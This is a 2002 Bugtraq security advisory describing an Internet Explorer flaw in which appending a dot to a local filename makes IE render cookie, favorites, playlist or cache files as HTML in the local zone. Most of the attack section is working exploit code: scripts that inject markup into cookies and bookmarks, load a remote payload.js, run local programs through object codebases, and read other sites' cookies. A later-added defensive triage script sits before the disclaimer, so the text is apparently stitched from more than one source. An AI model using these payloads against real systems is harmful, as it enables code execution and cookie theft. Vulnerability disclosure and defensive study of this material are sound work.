IE dot bug - Sandblad advisory #7

From: Andreas Sandblad (sandblad@acc.umu.se)
Date: 05/19/02


Date: Sun, 19 May 2002 16:45:15 +0200 (CEST)
From: Andreas Sandblad <sandblad@acc.umu.se>
To: bugtraq@securityfocus.com


                  - Sandblad advisory #7 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title: IE dot bug
            (updated IE: Remote webpage can script in local zone)
Date: [2002-05-19]
Software: Internet Explorer
Patches: MS02-023, MS02-015 (issue still not 100% solved)
Vendor: http://www.microsoft.com/                  _     _
Workaround: Disable active scripting             o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se       (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

HISTORY:
========
[2002-02-17]
Initially reported to Microsoft about the dot bug vulnerability.

[2002-03-28]
Microsoft released patch:
"Cookie-based Script Execution" (MS02-015)
Solution: Files in the cookie directory are not treated as being in the
local computer zone.
Problem: Not fixing the real issue. Still possible to use the cookie based
attack to read other cookies.

[2002-03-30]
A non-disclosure advisory was sent to Bugtraq:
"IE: Remote webpage can script in local zone"
http://online.securityfocus.com/archive/1/265459

[2002-05-15]
Microsoft released patch:
"Script within Cookies Reading Cookies" (MS02-023)
Solution: Put files in the cookie directory in the restrictive zone
(disables the exploit that reads other cookies). Attempts to prevent local
files with the .txt extension from being parsed as an html document using
the dot bug.
Problem: The real issue is still not fixed. By appending " ." instead of
".", files with the .txt extension can still be treated as html documents.

DESCRIPTION:
============
In order for IE to parse a local file as an html document, the filename
extension must be associated with html documents (normally .htm and
.html). Also, html code must be found somewhere in the beginning of the
file (IE will only scan a certain amount of bytes in the file). This is
good security because several types of user data are stored in local files
(cookies, favorites/bookmarks, application user data etc). The problem is
that IE can be tricked into thinking that a local file is an html document
regardless of file extension.

The trick is simply to add a dot "." when linking to a local filename. As
of patch MS02-023, a link to a file with the .txt extension needs " ."
(space + dot) instead. To test this behaviour, create a file called
c:/test.txt with some html code in it. Now compare the difference in parse
behaviour by typing the following in the address field:
about:test.txt .
and compare it with:
about:test.txt

The exploit method is the following:
1. Find a file that stores some data that can be controlled (generated by
IE or any other third-party software).
2. Make sure the data is inserted in the first x amount of bytes.
3. Inject html+script code in the file and link to it together with a dot
(or space + dot for .txt files). The script will be operating in the local
computer zone.

EXPLOIT:
========
----------------------------------------------------------------
NOTE: Please note that you MUST change some variables
      in order for the exploits to work. The following exploits
      have only been tested on IE 6.0. Because the exploits
      require knowledge of the exact path to files, they may fail
      on non-default systems.
----------------------------------------------------------------

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based script execution
IMPACT: Scripting in local computer zone - running local
         programs, running signed programs from a webpage,
         reading local files.
PATCH: MS02-015 released 28 March 2002 will stop this exploit.
NOTE: - This exploit is designed for Win 98/ME. In order
         to work on win 2000/XP username must be known.
         Please change cookieFile and scriptFile.
         - Code must be in a directory called "unique" to
         get correct name of cookie file.
----------------------------------------------------------------

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//cookieFile = "c:/DOCUME~1/ADMINI~1/cookies/administrator@unique[1].txt";
//cookieFile = "c:/windows/cookies/anyuser@unique[1].txt";
//scriptFile = "http://www.microsoft.com/unique/payload.js";

function injectCookie(){
  code = "<html><script src='"+scriptFile+"'><"+"/script><"+"/html>";
  document.cookie = "evil="+code+"; expires=Fri, 13 Dec 2003 23:59:59 GMT;";
  alert("*** Cookie injected! ***");
}
function loadCookie(){
  alert("*** Loading cookie! ***");
  document.location="file:///"+cookieFile+"."; // the important dot!
}
</script>

<a href="javascript:injectCookie()">injectCookie() step 1.</a><br>
<a href="javascript:loadCookie()">loadCookie() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
files = new Array(
  "c:/windows/system32/winmine.exe",
  "c:/windows/winmine.exe",
  "c:/winnt/system32/winmine.exe"
);
function init(){
  for (i=0;files[i];i++)
  {
    s = '<object classid=CLSID:12345678-1234-1234-1234-123456789012 ';
    s+= 'codebase="file:///'+files[i]+'" style=display:none></object>';
    document.write("<html>"+s+"<"+"/html>");
  }
}
window.onload=init;
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based cookie reading
IMPACT: Reading content of arbitrary cookie.
PATCH: MS02-023 released 15 May 2002 will stop this exploit.
NOTE: - Use the same exploit as for the
         "Cookie based script execution", but replace
         payload.js with code below.
         - cookieRead is set to read your google cookie.
         The cookie must of course exist. cookieRead must be
         altered.
----------------------------------------------------------------

payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
//cookieRead = "administrator@google[1].txt";
//cookieRead = "anyuser@google[1].txt";
s = '<iframe name=i src='+cookieRead+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
document.write(s);
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Favorite/bookmark based script execution
IMPACT: Scripting in local computer zone.
PATCH: NONE
NOTE: - This exploit is designed for Win 98/ME. In order
         to work on win 2000/XP username must be known.
         Please change bookmarkFile and scriptFile.
         - Use the same payload.js as in the exploit
         "Cookie based script execution".
----------------------------------------------------------------

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//bookmarkFile = "c:/DOCUME~1/ADMINI~1/favorites/unique.url";
//bookmarkFile = "c:/windows/favorites/unique.url";
//scriptFile = "http://www.microsoft.com/unique/payload.js";

function injectBookmark(){
  code = '<html><script>document.scripts[0].src="';
  code += scriptFile+'"<'+'/script><'+'/html>';
  window.external.AddFavorite('http://'+code,'unique');
}
function loadBookmark(){
  alert("*** Loading bookmark file! ***");
  document.location="file:///"+bookmarkFile+"."; // the important dot!
}
</script>

<a href="javascript:injectBookmark()">injectBookmark() step 1.</a><br>
<a href="javascript:loadBookmark()">loadBookmark() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Third-party software based script execution
IMPACT: Scripting in local computer zone. For some software,
         execution of arbitrary remote programs.
PATCH: NONE
NOTE: Only a few third-party programs were investigated.
----------------------------------------------------------------
Winamp:
Winamp stores the current playlist in "c:/program files/winamp/winamp.m3u".
The playlist will contain artist name and song title. If we inject
html/script code in the artist/title of an mp3 file (ID3v2 tag) that is
loaded remotely, the new playlist file will be saved together with the html
code. Using the dot bug trick, the local playlist file can be loaded and
operate in the local zone. Since the playlist file will contain the exact
path to the "temporary internet folder", we can, using the old ".chm
helpfile attack" or the codebase of the object tag, run arbitrary code.

Java(TM) 2 SDK, Standard Edition, v 1.4.0:
Classfiles and graphics for applets are stored in
%userprofile%\.jpi_cache\file\1.0\
Exploit method: Insert html/script code in a gif picture used in a java
applet loaded from a remote webpage. The local filename of the picture will
be named something like (random characters):
exploita.gif-41615d6-26f536aa.gif
This is equal to EXPLOI~1.GIF (old filesystem support). Use the dot bug
trick to load the file as a html document. Script will be operating in the
local computer zone.
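
An added triage check, not part of the advisory: the stores named in the methods above (cookie files, .url favorites, winamp.m3u, the applet cache) share one precondition, markup inside the leading bytes of a file that is not supposed to be HTML, and this looks for exactly that. The 256-byte window, the tag list and all sample file contents are assumptions constructed for the example; the advisory gives no window size.

```javascript
// Constructed triage check; not part of the advisory.
// Assumed window: the advisory only says IE scans "a certain amount of bytes".
const SNIFF_WINDOW = 256;
const MARKUP_RE = /<\s*(html|script|iframe|object|body)\b/i;
const HTML_NAMES = /\.html?$/i;

// Returns a finding when a non-HTML file carries markup inside the window.
// `content` may be a string or a Buffer (e.g. from fs.readFileSync).
function leadingMarkup(fileName, content, windowBytes = SNIFF_WINDOW) {
  if (HTML_NAMES.test(fileName)) return null; // markup is expected here
  // latin1 keeps one character per byte, so offsets are byte offsets.
  const head = Buffer.from(content, "latin1").subarray(0, windowBytes);
  const match = MARKUP_RE.exec(head.toString("latin1"));
  return match
    ? { fileName, tag: match[1].toLowerCase(), offset: match.index }
    : null;
}

// Constructed samples modelled on the file kinds the advisory names.
const SAMPLES = [
  ["anyuser@unique[1].txt",
   "evil\n<html><script src='http://example.invalid/p.js'></script></html>\nunique/\n1024\n"],
  ["anyuser@shop[1].txt", "session\nabc123\nshop.example/\n1024\n"],
  ["unique.url",
   "[InternetShortcut]\nURL=http://<html><script>/* constructed */</script></html>\n"],
  ["winamp.m3u", "#EXTM3U\n#EXTINF:215,Artist - Title\nC:\\music\\a.mp3\n"],
  // Markup beyond the window: reported only when a larger window is requested.
  ["late.txt", "x".repeat(300) + "<script>/* constructed */</script>"],
];

function triage(samples = SAMPLES, windowBytes = SNIFF_WINDOW) {
  return samples
    .map(([name, content]) => leadingMarkup(name, content, windowBytes))
    .filter(Boolean);
}

console.table(triage());
```
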

Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.

Old advisories:
===============
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

Feedback:
=========
(I will be away 22-26 May)
Please send suggestions and comments to:           _     _
sandblad@acc.umu.se                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--


